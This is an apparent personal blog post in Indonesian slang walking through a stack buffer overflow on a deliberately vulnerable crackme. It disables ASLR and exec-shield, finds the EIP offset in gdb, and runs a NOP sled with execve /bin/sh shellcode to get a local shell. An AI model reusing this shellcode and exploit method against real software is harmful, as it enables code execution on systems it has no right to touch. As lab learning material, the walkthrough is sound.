yah tulisan ini cuman buat catetan ane aja kok , gag ada niat buat jingkrak jingkrak pas liat apa itu namanya sekmentasiyem folt.di sini ane di kasih ama si didik sors krekme a.k.a crackme buat liat2 aja sih sebenernya . contoh 1 sors yang bernama abo1.c kek yang di bawah ini gan
int main(int argv,char **argc) {
char buf[256];
strcpy(buf,argc[1]);
}
ok sebelumnya matiin beberapa opsi proteksiyen nya ASLR ama exec shield ,
sikopet@sikopet-an:~/Downloads/krekme$ echo "0" > /proc/sys/kernel/randomize_va_space
sikopet@sikopet-an:~/Downloads/krekme$ echo "0" > /proc/sys/kernel/exec-shield
sikopet@sikopet-an:~/Downloads/krekme$ echo "0" > /proc/sys/kernel/exec-shield-randomize
tapi sebelumnya kudu sudo su dolo deh gan, ya klo mau di idupin ksh nilai 1 aja .
okeh sekarang di kompail file abo1.c (jng lupa di ksh opsi buat matiin fungsi default stack protector kyk gini -fno-stack-protector) yang diatas en den di run pake opsi perl kyk di bawah :
sikopet@sikopet-an:~/Downloads/krekme$ gcc -fno-stack-protector abo1.c -o abo1test
sikopet@sikopet-an:~/Downloads/krekme$ ./abo1test `perl -e 'print "A"x10'`
nah klo gag terjadi apa2 , naekin aja nilai 10 nya sampe ntr ketemu yang namanya sekmentasiyen fol, kyk yang di bawah ini
sikopet@sikopet-an:~/Downloads/krekme$ ./abo1test `perl -e 'print "A"x269'`
oke klo udah coba di gdb gan
sikopet@sikopet-an:~/Downloads/krekme$ gdb ./abo1test
GNU gdb (GDB) 7.2-ubuntu
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
Reading symbols from /home/sikopet/Downloads/krekme/abo1test...(no debugging symbols found)...done.
(gdb) r `perl -e 'print "A"x269'`
Starting program: /home/sikopet/Downloads/krekme/abo1test `perl -e 'print "A"x269'`
Program received signal SIGSEGV, Segmentation fault.
0x00140043 in ?? () from /lib/libc.so.6
/* cococococombo breaker */
nah coba aja di naek ato turinin sampe nilai EIP nya 0x41414141 , en itu ada di nilai 272 .
/* cococococombo breaker */
(gdb) r `perl -e 'print "A"x272'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/sikopet/Downloads/krekme/abo1test `perl -e 'print "A"x272'`
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
/* cococococombo breaker */
klo gag percaya nilai EIP nya segitu coba aja ketik i r
/* cococococombo breaker */
(gdb) i r
eax 0xbffff1a0 -1073745504
ecx 0x0 0
edx 0x111 273
ebx 0x288ff4 2658292
esp 0xbffff2b0 0xbffff2b0
ebp 0x41414141 0x41414141
esi 0x0 0
edi 0x0 0
eip 0x41414141 0x41414141
eflags 0x10246 [ PF ZF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
/* cococococombo breaker */
41 = A
/* cococococombo breaker */
nah sekarang kita coba pake return address , pake contoh deadbeef aja ya return address nya
jd kyk gini 0xdeadbeef (nah return address itu bernilai 4 byte krn 2 karakter di itung 1 byte)
nah jadi nilai payload full kita tadi yang diatas 272 byte - 4 byte = 268 byte .
nah di sini ane coba pake selkod yang umum aja, ya krn ane jg blm bisa bikin shell code.
selkod umum : "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
nah nilai shellcodeumum itu 25 byte , jadi 268 - 25 = 243byte.
nah jadi kira2 nanti susunannya begini deh ato biasa di sebut attack vector
[karakter A sampe 268bye][selkod 25byte][return address 4byte] /*attack vector*/
nah sekarang kiat liat return address nya 0xdeadbeef , di jadiin litle endian
de ad be ef -> ef be ad de <--jadi litel endian
dan di tambah eksekiyut \x jadi ntr begini deh kira2 \xef\xbe\xad\xde , jadi itu alamat dari si return address pura pura kita.
oke sekarang kita coba jalanin pake opsi perl kyk di bawah ini gan, dengan nilai2 selkod , dan return adress pura pura itu tadi.kira2 begini syntaxnya
`perl -e 'print "A"x243 . "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" . "\xef\xbe\xad\xde"'`
sikopet@sikopet-an:~/Downloads/krekme$ gdb ./abo1test
GNU gdb (GDB) 7.2-ubuntu
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
Reading symbols from /home/sikopet/Downloads/krekme/abo1test...(no debugging symbols found)...done.
(gdb) r `perl -e 'print "A"x243 . "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" . "\xef\xbe\xad\xde"'`
Starting program: /home/sikopet/Downloads/krekme/abo1test `perl -e 'print "A"x243 . "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" . "\xef\xbe\xad\xde"'`
Program received signal SIGSEGV, Segmentation fault.
0x00deadbe in ?? ()
/* cococococombo breaker */
coba naekin jadi 244
/* cococococombo breaker */
(gdb) r `perl -e 'print "A"x244 . "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" . "\xef\xbe\xad\xde"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/sikopet/Downloads/krekme/abo1test `perl -e 'print "A"x244 . "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" . "\xef\xbe\xad\xde"'`
Program received signal SIGSEGV, Segmentation fault.
0xdeadbeef in ?? ()
(gdb) i r
eax 0xbffff1a0 -1073745504
ecx 0x0 0
edx 0x111 273
ebx 0x288ff4 2658292
esp 0xbffff2b0 0xbffff2b0
ebp 0x80cd0bb0 0x80cd0bb0
esi 0x0 0
edi 0x0 0
eip 0xdeadbeef 0xdeadbeef
eflags 0x10246 [ PF ZF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
/* cococococombo breaker */
yoi mamen EIP nya udah ke isi dengan return address pura pura , berarti sellkod nya 24byte bukan 25 :p , nah sekarang kita cek ESP nya gan , ketik gini di gdb nya x/10s $esp , en trus pencet enter sampe ketemu TERM atau SHELL
/* cococococombo breaker */
(gdb) x/10s $esp
0xbffff2b0: ""
0xbffff2b1: ""
0xbffff2b2: ""
0xbffff2b3: ""
0xbffff2b4: "T\363\377\277`\363\377\277H\370\377\267"
0xbffff2c1: "\364\377\277\377\377\377\377\364\317\022"
0xbffff2cc: ",\202\004\b\001"
0xbffff2d2: ""
0xbffff2d3: ""
0xbffff2d4: "\020\363\377\277V\341\021"
(gdb)
/* cococococombo breaker */
di enter trus sampe keluar kyk yang di bawah ini.
/* cococococombo breaker */
(gdb)
0xbffff4cc: "/home/sikopet/Downloads/krekme/abo1test"
0xbffff4f4: 'A'
0xbffff5bc: 'A'
0xbffff605: "ORBIT_SOCKETDIR=/tmp/orbit-sikopet"
0xbffff628: "SSH_AGENT_PID=1491"
0xbffff63b: "SHELL=/bin/bash"
0xbffff64b: "TERM=xterm"
0xbffff656: "XDG_SESSION_COOKIE=87be01b5d31c11d12ebb47b40000000b-1300270010.310578-2047811633"
0xbffff6a7: "WINDOWID=58915617"
0xbffff6b9: "GNOME_KEYRING_CONTROL=/tmp/keyring-6ofpaj"
(gdb)
naaaaaaaaaaaaaaaaah , yang repeats 200 times itu adalah NOPS a.k.a no operation, klo nilai litle endian nya itu 0x90 . naaaaaaah di bawah nya nops ini adalah nilai return address yang sebenernya gan. 0xbffff5c0, trus di jadiin litle endian en di ksh eksekiyut deh .
0xbffff5c0 -> \xc0\xf5\xff\xbf /* aselew return addressnya */
nah coba sekarang di jalanin kyk yang di bawah ini deh .
sikopet@sikopet-an:~/Downloads/krekme$ ./abo1test `perl -e 'print "\x90"x244 . "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" . "\xc0\xf5\xff\xbf"'`
$ whoami
sikopet
/* cococococombo breaker */
yehe , jd syntax di atas itu apabila si abo1test di jalanin yang jalan si selkod nya . yah kira2 begitu deh .
/* cococococombo breaker */
yasudah klo begitu ane mo nonton heripoter dolo ahk
filenya bisa di download di sini
No comments:
Post a Comment